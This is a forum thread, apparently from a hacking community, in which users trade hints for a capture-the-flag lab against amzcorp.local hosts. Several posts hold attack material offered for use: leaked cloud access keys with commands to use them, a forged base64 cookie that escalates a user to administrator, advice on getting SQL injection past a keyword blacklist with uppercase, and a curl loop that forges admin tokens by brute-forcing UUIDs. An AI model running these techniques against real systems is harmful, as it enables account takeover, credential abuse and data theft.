Posts: 104 Threads: 0 Joined: N/A (July 15, 2022, 03:46 PM)fironeDerbert Wrote: There is creds in the git:
ecs = boto3.client('ecs',aws_access_key_id="ASIAGCB1NKN8SCJOVP2K",aws_secret_access_key="tOzF/tLK3S3CNsXfj0mjPsIH2iCh5odYHMPDwSVxn7CB5",region_name="eu-east-1",endpoint_url='http://cloud.amzcorp.local')
You can use them like this:
apt-get install awscli
aws configure
enter the creds
aws --endpoint-url http://cloud.amzcorp.local ecs help
these creds are useless focus on custom_jwt.py and you can exploit this ecdsa library it is a crypto shit i'm stuck here if yor are good in crypto then maybe you can find flag 4 and that jwt creating here http://company-support.amzcorp.localPosts: 132 Threads: 0 Joined: N/A (July 15, 2022, 03:59 PM)hacker1111 Wrote: (July 15, 2022, 03:46 PM)fironeDerbert Wrote: There is creds in the git:
ecs = boto3.client('ecs',aws_access_key_id="ASIAGCB1NKN8SCJOVP2K",aws_secret_access_key="tOzF/tLK3S3CNsXfj0mjPsIH2iCh5odYHMPDwSVxn7CB5",region_name="eu-east-1",endpoint_url='http://cloud.amzcorp.local')
You can use them like this:
apt-get install awscli
aws configure
enter the creds
aws --endpoint-url http://cloud.amzcorp.local ecs help
these creds are useless focus on custom_jwt.py and you can exploit this ecdsa library
it is a crypto shit i'm stuck here if yor are good in crypto then maybe you can find flag 4
and that jwt creating here http://company-support.amzcorp.local The custom_jwt.py is to get the flag 4 or the flag 3 ? Posts: 104 Threads: 0 Joined: N/A (July 15, 2022, 04:06 PM)fironeDerbert Wrote: (July 15, 2022, 03:59 PM)hacker1111 Wrote: (July 15, 2022, 03:46 PM)fironeDerbert Wrote: There is creds in the git:
ecs = boto3.client('ecs',aws_access_key_id="ASIAGCB1NKN8SCJOVP2K",aws_secret_access_key="tOzF/tLK3S3CNsXfj0mjPsIH2iCh5odYHMPDwSVxn7CB5",region_name="eu-east-1",endpoint_url='http://cloud.amzcorp.local')
You can use them like this:
apt-get install awscli
aws configure
enter the creds
aws --endpoint-url http://cloud.amzcorp.local ecs help
these creds are useless focus on custom_jwt.py and you can exploit this ecdsa library
it is a crypto shit i'm stuck here if yor are good in crypto then maybe you can find flag 4
and that jwt creating here http://company-support.amzcorp.local
The custom_jwt.py is to get the flag 4 or the flag 3 ? flag 4 flag 3 is in sql db. dump keys_tbl table Posts: 132 Threads: 0 Joined: N/A Any hint to dump the database ? Posts: 23 Threads: 0 Joined: N/A July 16, 2022 at 11:09 AM (July 16, 2022, 09:34 AM)fironeDerbert Wrote: Any hint to dump the database ? line # 521 file name routes.py fullpath is dea918ebb439498bf14e448e65ca960883900254/jobs_portal/apps/home/routes.py . there is a function update_user you can update the user logon to administrator on jobs.amzcorp.local. with . loging as tyler and use his cookies {"username":"mceye","email":" [email protected]","role":"Administrators"} then base64 {"update_user":"eyJ1c2VybmFtZSI6Im1jZXllIiwiZW1haWwiOiJtY2V5ZUBhbXpjb3JwLmxvY2FsIiwicm9sZSI6IkFkbWluaXN0cmF0b3JzIn0="} The on the search username= paramater is sql injectable. but it has blacklisted characthers and strings blacklist = ["0x", "**", "ifnull", " or ", "union"] do it manually like ussing uppercases. Posts: 6 Threads: 0 Joined: N/A July 16, 2022 at 11:26 PM [quote="hacker1111" pid="146001" dateline="1657645911"][code]for i in {950..975}; do echo -n '{"get_token":"True","uuid":'$i',"username":"admin"}' | base64; done | xargs -I{} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=" -d '{"data":"{}"}' --header "Content-Type: application/json"[/code][code]Early Access Flag[/code][/quote]Hey! Does this still work? ? I tried with a bigger range, but I'm always getting a HTML response with "403" and "Access denied", etc. Any help? Thanks! Posts: 73 Threads: 0 Joined: N/A July 17, 2022 at 12:16 AM [quote="ethicalhunt3r" pid="154861" dateline="1658013994"][quote="hacker1111" pid="146001" dateline="1657645911"][code]for i in {950..975}; do echo -n '{"get_token":"True","uuid":'$i',"username":"admin"}' | base64; done | xargs -I{} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=" -d '{"data":"{}"}' --header "Content-Type: application/json"[/code][code]Early Access Flag[/code][/quote]Hey! Does this still work? ? I tried with a bigger range, but I'm always getting a HTML response with "403" and "Access denied", etc. Any help? Thanks![/quote]Yes still works.Did you have created an account previously in jobs?Then replace with his cookie value. Posts: 104 Threads: 0 Joined: N/A [quote="ethicalhunt3r" pid="154861" dateline="1658013994"][quote="hacker1111" pid="146001" dateline="1657645911"][code]for i in {950..975}; do echo -n '{"get_token":"True","uuid":'$i',"username":"admin"}' | base64; done | xargs -I{} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=" -d '{"data":"{}"}' --header "Content-Type: application/json"[/code][code]Early Access Flag[/code][/quote]Hey! Does this still work? ? I tried with a bigger range, but I'm always getting a HTML response with "403" and "Access denied", etc. Any help? Thanks![/quote]yes it's still working btw no need to use for loop i added for loop incase if they change admin UUID[code]echo -n '{"get_token":"True","uuid":"955","username":"admin"} ' | base64 | xargs -I {} curl -s -X POST "http://jobs.amzcorp.local/api/v4/tokens/get" --cookie "session=" -d '{"data":"{}"}' --header "Content-Type: application/json"[/code] Posts: 6 Threads: 0 Joined: N/A (July 15, 2022, 04:10 PM)hacker1111 Wrote: (July 15, 2022, 04:06 PM)fironeDerbert Wrote: (July 15, 2022, 03:59 PM)hacker1111 Wrote: (July 15, 2022, 03:46 PM)fironeDerbert Wrote: There is creds in the git:
ecs = boto3.client('ecs',aws_access_key_id="ASIAGCB1NKN8SCJOVP2K",aws_secret_access_key="tOzF/tLK3S3CNsXfj0mjPsIH2iCh5odYHMPDwSVxn7CB5",region_name="eu-east-1",endpoint_url='http://cloud.amzcorp.local')
You can use them like this:
apt-get install awscli
aws configure
enter the creds
aws --endpoint-url http://cloud.amzcorp.local ecs help
these creds are useless focus on custom_jwt.py and you can exploit this ecdsa library
it is a crypto shit i'm stuck here if yor are good in crypto then maybe you can find flag 4
and that jwt creating here http://company-support.amzcorp.local
The custom_jwt.py is to get the flag 4 or the flag 3 ?
flag 4
flag 3 is in sql db. dump keys_tbl table any chance u could help w flag 3? cant seem to get my sqli to work.. Posts: 43 Threads: 0 Joined: N/A July 17, 2022 at 10:03 AM Any chance someone could help with how to extract the base64.c00.xyz in "logs.amzcorp.local"? Tried different kind of grep, jq, even notepad++
nvm ... managed to extract them using transpose paste in excel :)
But couldn't find any flag, just the parts of passwd file and cron...
nvm ... got the flag...
|
